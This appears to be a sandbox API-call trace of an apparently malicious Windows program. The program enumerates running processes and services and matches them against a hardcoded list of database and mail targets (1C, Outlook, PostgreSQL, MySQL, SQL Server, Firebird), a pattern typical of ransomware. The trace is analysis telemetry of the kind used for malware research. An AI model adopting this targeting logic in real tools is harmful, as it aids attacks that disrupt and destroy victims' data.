	[0147.607] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1
	[0147.607] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1
	[0147.607] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1
	[0147.607] lstrlenW (lpString="RpcSs") returned 5
	[0147.607] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1
	[0147.607] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1
	[0147.607] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1
	[0147.607] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1
	[0147.607] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1
	[0147.607] lstrlenW (lpString="SamSs") returned 5
	[0147.607] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1
	[0147.607] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1
	[0147.607] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1
	[0147.607] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1
	[0147.607] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1
	[0147.608] lstrlenW (lpString="Schedule") returned 8
	[0147.608] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1
	[0147.608] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1
	[0147.608] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1
	[0147.608] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1
	[0147.608] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1
	[0147.608] lstrlenW (lpString="SENS") returned 4
	[0147.608] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1
	[0147.608] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1
	[0147.608] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1
	[0147.608] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1
	[0147.608] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1
	[0147.608] lstrlenW (lpString="ShellHWDetection") returned 16
	[0147.608] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0147.608] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0147.608] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1
	[0147.608] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1
	[0147.608] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1
	[0147.608] lstrlenW (lpString="Spooler") returned 7
	[0147.608] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1
	[0147.608] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1
	[0147.608] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1
	[0147.608] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1
	[0147.608] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1
	[0147.608] lstrlenW (lpString="Themes") returned 6
	[0147.608] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1
	[0147.608] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1
	[0147.608] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1
	[0147.608] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1
	[0147.608] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1
	[0147.608] lstrlenW (lpString="UxSms") returned 5
	[0147.609] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1
	[0147.609] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1
	[0147.609] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1
	[0147.609] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1
	[0147.609] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1
	[0147.609] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0xb612378 | out: hHeap=0x7ab0000) returned 1
	[0147.609] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x398
	[0147.611] Process32FirstW (in: hSnapshot=0x398, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0147.611] Process32NextW (in: hSnapshot=0x398, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0147.611] lstrlenW (lpString="System") returned 6
	[0147.611] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1
	[0147.611] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1
	[0147.611] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1
	[0147.611] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1
	[0147.611] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1
	[0147.611] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1
	[0147.611] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1
	[0147.611] Process32NextW (in: hSnapshot=0x398, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0147.612] lstrlenW (lpString="smss.exe") returned 8
	[0147.612] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1
	[0147.612] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1
	[0147.612] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1
	[0147.612] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1
	[0147.612] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1
	[0147.612] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1
	[0147.612] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1
	[0147.612] Process32NextW (in: hSnapshot=0x398, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0147.612] lstrlenW (lpString="csrss.exe") returned 9
	[0147.612] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0147.612] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0147.612] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0147.612] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0147.612] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0147.612] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0147.612] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0147.612] Process32NextW (in: hSnapshot=0x398, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0147.613] lstrlenW (lpString="wininit.exe") returned 11
	[0147.613] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1
	[0147.613] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1
	[0147.613] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1
	[0147.613] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1
	[0147.613] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1
	[0147.613] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1
	[0147.613] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1
	[0147.613] Process32NextW (in: hSnapshot=0x398, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0147.613] lstrlenW (lpString="csrss.exe") returned 9
	[0147.613] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0147.613] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0147.613] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0147.613] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0147.613] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0147.613] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0147.614] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0147.614] Process32NextW (in: hSnapshot=0x398, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0147.614] lstrlenW (lpString="winlogon.exe") returned 12
	[0147.614] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1
	[0147.614] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1
	[0147.614] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1
	[0147.614] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1
	[0147.614] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1
	[0147.614] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1
	[0147.614] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1
	[0147.614] Process32NextW (in: hSnapshot=0x398, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0147.615] lstrlenW (lpString="services.exe") returned 12
	[0147.615] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1
	[0147.615] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1
	[0147.615] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1
	[0147.615] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1
	[0147.615] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1
	[0147.615] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1
	[0147.615] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1
	[0147.615] Process32NextW (in: hSnapshot=0x398, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0147.615] lstrlenW (lpString="lsass.exe") returned 9
	[0147.615] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1
	[0147.615] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1
	[0147.615] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1
	[0147.615] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1
	[0147.615] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1
	[0147.615] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1
	[0147.615] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1
	[0147.615] Process32NextW (in: hSnapshot=0x398, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0147.616] lstrlenW (lpString="lsm.exe") returned 7
	[0147.616] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1
	[0147.616] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1
	[0147.616] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1
	[0147.616] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1
	[0147.616] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1
	[0147.616] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1
	[0147.616] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1
	[0147.616] Process32NextW (in: hSnapshot=0x398, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0147.616] lstrlenW (lpString="svchost.exe") returned 11
	[0147.616] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0147.616] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0147.616] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0147.616] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1
	[0147.616] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1
	[0147.616] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1
	[0147.616] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1
	[0147.616] Process32NextW (in: hSnapshot=0x398, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0147.617] lstrlenW (lpString="svchost.exe") returned 11
	[0147.617] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0147.617] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0147.617] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0147.617] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1
	[0147.617] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1
	[0147.617] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1
	[0147.617] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1
	[0147.617] Process32NextW (in: hSnapshot=0x398, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0147.617] lstrlenW (lpString="svchost.exe") returned 11
	[0147.617] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0147.617] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0147.617] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0147.617] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1
	[0147.617] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1
	[0147.617] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1
	[0147.617] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1
	[0147.618] Process32NextW (in: hSnapshot=0x398, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0147.618] lstrlenW (lpString="svchost.exe") returned 11
	[0147.618] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0147.618] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0147.618] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0147.618] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1
	[0147.618] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1
	[0147.618] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1
	[0147.618] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1
	[0147.618] Process32NextW (in: hSnapshot=0x398, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0147.618] lstrlenW (lpString="svchost.exe") returned 11
	[0147.618] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0147.618] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0147.618] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0147.619] Process32NextW (in: hSnapshot=0x398, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0147.619] lstrlenW (lpString="audiodg.exe") returned 11
	[0147.619] Process32NextW (in: hSnapshot=0x398, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0147.619] lstrlenW (lpString="svchost.exe") returned 11
	[0147.619] Process32NextW (in: hSnapshot=0x398, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0147.619] lstrlenW (lpString="svchost.exe") returned 11
	[0147.620] Process32NextW (in: hSnapshot=0x398, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0147.620] lstrlenW (lpString="spoolsv.exe") returned 11
	[0147.620] Process32NextW (in: hSnapshot=0x398, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0147.620] lstrlenW (lpString="svchost.exe") returned 11
	[0147.620] Process32NextW (in: hSnapshot=0x398, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x474, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0147.620] lstrlenW (lpString="taskhost.exe") returned 12
	[0147.621] Process32NextW (in: hSnapshot=0x398, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1
	[0147.621] lstrlenW (lpString="userinit.exe") returned 12
	[0147.621] Process32NextW (in: hSnapshot=0x398, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0147.621] lstrlenW (lpString="dwm.exe") returned 7
	[0147.621] Process32NextW (in: hSnapshot=0x398, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x4c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0147.622] lstrlenW (lpString="explorer.exe") returned 12
	[0147.622] Process32NextW (in: hSnapshot=0x398, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x4ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="gjfkyfli;.exe")) returned 1
	[0147.622] lstrlenW (lpString="gjfkyfli;.exe") returned 13
	[0147.622] Process32NextW (in: hSnapshot=0x398, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x694, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1
	[0147.622] lstrlenW (lpString="reader_sl.exe") returned 13
	[0147.622] Process32NextW (in: hSnapshot=0x398, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x694, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 0
	[0147.623] CloseHandle (hObject=0x398) returned 1
	[0147.623] Sleep (dwMilliseconds=0x1f4) 
	[0148.193] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0xb616f08
	[0148.289] EnumServicesStatusExW (in: hSCManager=0xb616f08, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0) returned 0
	[0148.289] GetLastError () returned 0xea
	[0148.289] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xc9a) returned 0xb612378
	[0148.289] EnumServicesStatusExW (in: hSCManager=0xb616f08, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0xb612378, cbBufSize=0xc9a, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0xb612378, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0) returned 1
	[0148.289] CloseServiceHandle (hSCObject=0xb616f08) returned 1
	[0148.290] lstrlenW (lpString="AudioEndpointBuilder") returned 20
	[0148.290] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0148.290] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0148.290] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1
	[0148.290] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1
	[0148.290] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1
	[0148.290] lstrlenW (lpString="AudioSrv") returned 8
	[0148.290] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1
	[0148.290] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1
	[0148.290] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1
	[0148.290] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1
	[0148.290] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1
	[0148.290] lstrlenW (lpString="BFE") returned 3
	[0148.290] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1
	[0148.290] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1
	[0148.290] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1
	[0148.290] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1
	[0148.290] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1
	[0148.290] lstrlenW (lpString="CryptSvc") returned 8
	[0148.290] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1
	[0148.290] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1
	[0148.290] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1
	[0148.290] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1
	[0148.290] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1
	[0148.291] lstrlenW (lpString="CscService") returned 10
	[0148.291] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1
	[0148.291] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1
	[0148.291] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1
	[0148.291] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1
	[0148.291] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1
	[0148.291] lstrlenW (lpString="DcomLaunch") returned 10
	[0148.291] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1
	[0148.291] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1
	[0148.291] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1
	[0148.291] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1
	[0148.291] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1
	[0148.291] lstrlenW (lpString="Dhcp") returned 4
	[0148.291] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1
	[0148.291] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1
	[0148.291] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1
	[0148.291] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1
	[0148.291] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1
	[0148.291] lstrlenW (lpString="Dnscache") returned 8
	[0148.291] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1
